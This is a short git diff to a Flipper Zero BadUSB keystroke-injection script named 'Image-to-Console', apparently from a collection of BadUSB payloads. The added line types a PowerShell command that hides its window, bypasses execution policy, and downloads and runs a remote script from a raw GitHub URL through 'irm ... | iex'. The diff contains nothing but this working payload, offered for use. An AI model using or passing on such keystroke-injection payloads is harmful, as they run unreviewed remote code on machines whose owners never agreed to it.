diff --git a/Image-to-Console/Image-to-Console.txt b/Image-to-Console/Image-to-Console.txt index 1cb3838..76104fc 100644 --- a/Image-to-Console/Image-to-Console.txt +++ b/Image-to-Console/Image-to-Console.txt @@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C irm URL | iex +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Image-to-Console/main.ps1 | iex ENTER